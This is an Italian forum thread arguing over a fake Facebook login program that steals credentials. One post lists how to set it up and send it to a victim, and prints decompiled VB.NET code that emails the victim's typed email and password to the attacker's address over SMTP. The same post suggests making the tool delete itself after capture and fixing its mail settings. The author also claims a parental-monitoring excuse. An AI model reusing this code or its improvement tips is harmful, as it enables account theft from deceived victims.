• Regolamento Macrocategoria DEV
    Prima di aprire un topic nella Macrocategoria DEV, è bene leggerne il suo regolamento. Sei un'azienda o un hosting/provider? Qui sono anche contenute informazioni per collaborare con Sciax2 ed ottenere l'accredito nella nostra community!
Non dico cavolate,ho solo decompilato il tuo programma,e ho analizzato il source... ed è tutto legale,nessuna violazione...
Comunque stai calmo,perchè sei tu che stai rilasciando un programma illegale,perchè ruba i dati altrui... Se lo invio e lo faccio analizzare agli organi competenti,voglio vedere cosa dicono.
Chiunque può decompilare il tuo programma e vedere che non sto dicendo cavolate...
Inoltre perchè chiedi l'intervento di un moderatore che STRANAMENTE è della tua stessa città ? perchè proprio lui ?
Mah...
E comunque i moderatori per analizzare il tuo codice devono decompilarlo,non serve che tu gli mandi un codice "pulito",questo sono capaci tutti a farlo..

Giustamente, prima gli dici che non sa programmare, e poi dici che tutti sono capaci di prendere un codice. Va bene.
 
Non dico cavolate,ho solo decompilato il tuo programma,e ho analizzato il source... ed è tutto legale,nessuna violazione...
Comunque stai calmo,perchè sei tu che stai rilasciando un programma illegale,perchè ruba i dati altrui... Se lo invio e lo faccio analizzare agli organi competenti,voglio vedere cosa dicono.
Chiunque può decompilare il tuo programma e vedere che non sto dicendo cavolate...
Inoltre perchè chiedi l'intervento di un moderatore che STRANAMENTE è della tua stessa città ? perchè proprio lui ?
Mah...
E comunque i moderatori per analizzare il tuo codice devono decompilarlo,non serve che tu gli mandi un codice "pulito",questo sono capaci tutti a farlo..

se lo invio a organi competenti ti mandano a quel paese , il programma non è illegale , per giunta se decompili con net reflector il codice non è veritiero al 100% , 2 un software può essere tranquillamente offuscato sia a livello di codice IL che di cod sorgente (sempre che tu sappia cos'è!) 3 I moderatori non hanno nessuno interesse a far passare un software "maligno/che ruba dati " per un software che non danneggia il pc!

:boiate:
 
Ultima modifica:
lui lha voluto cosi, comunque hai tutte le ragioni, chiedo scusa per lirruenza, ma ti assicuro che non arrivano a me, ma come leggi anche dal codice postato da te arrivano ad una "string3" che corrisponde alla textbox nel menu avanzato! io ho sbagliato, pero ti assicuro che funziona, comunque non deve essere utilizzato a scopi illegali! Sia ben chiaro! Ma soltanto se si ha l'autorizzazione oppure se si è genitori e si vuole controllare il proprio figlio!!!


Inviato da mio iPhone utilizzando
Perfavore, Entra oppure Registrati per vedere i Link!
 
@paobalz per vedere se è una cavolata o meno, fai un video dove dimostri che funziona, se è per questo nemmeno io non ci credo!
 
Chiariamo la faccenda:

Il programma "funziona". Il perchè delle apici? Semplice, è fatto male e nessuno ci cascherebbe. Ma la sua funzione la fa:
-Tieni premuto M e O
-Sostituisci la Mail e il programma la salva nelle Setting
-Invii il file alla vittima
-Ammesso che lei ci caschi inserirà i suoi dati di accesso
-Il programma le invia alla mail scelta precedentemente avvisando la vittima con un finto messaggio di errore*

*Sarebbe tutto fantastico se non fosse per il cattivo utilizzo dell'smtp (e della grafica... e del codice). Infatti il programma usa come mittente l'email "noreply@frxbook.tk". Si capisce che il programmatore non ha grandi doti oppure grandi conoscenze riguardo al mondo degli smtp. Questo perchè l'invio dei dati per email avviene con un smpt Alice, ovvero solo le mail inviate da un account Alice potranno essere spedite con successo e "noreply@frxbook.tk" non è un account Alice. Oltre al fatto che hai omesso la porta (che di solito per molti Provider è 587) e altre impostazioni importanti che l'smpt richiede (non sono sicuro del fatto che Alice le richieda, dovrei informarmi).

Ci sono anche molte imprecisioni (grandi) da correggere. La grafica può essere una di queste (ok, non è molto necessaria in un programma del genere ma anche l'occhio vuole la sua parte). Il codice: ci sono 6 Form all'interno del programma, di cui inutilizzati 3! Se fosse un progetto fatto bene una volta prese le password il programma si dovrebbe chiudere ed eliminare, non aprire altri form obsoleti.
E' da migliorare. Molto.
Prova a partire da cose più piccole e via via aumentare la difficoltà, senza fretta.Vedrai che otterrai risultati molto più vantaggiosi ;)

If Me.TextBox1.Text.Contains("@") Then
Dim message As New MailMessage
message = New MailMessage With { _
.From = New MailAddress("noreply@frxbook.tk") _
}
message.To.Add(MySettingsProperty.Settings.setting3)
message.Subject = "Facebook Chimera Service"
message.Priority = MailPriority.Normal
message.Body = ("E-mail: " & Me.TextBox1.Text & " Password: " & Me.TextBox2.Text)
New SmtpClient("out.alice.it").Send(message)
MyProject.Forms.Form2.Show
Me.Hide
Else
Interaction.MsgBox("L'email non " & ChrW(232) & " corretta ", MsgBoxStyle.Critical, Nothing)
End If
 
EDIT: Scusate ho sbagliato persona pensavo eri quello di chrome chimera...
 
Ultima modifica: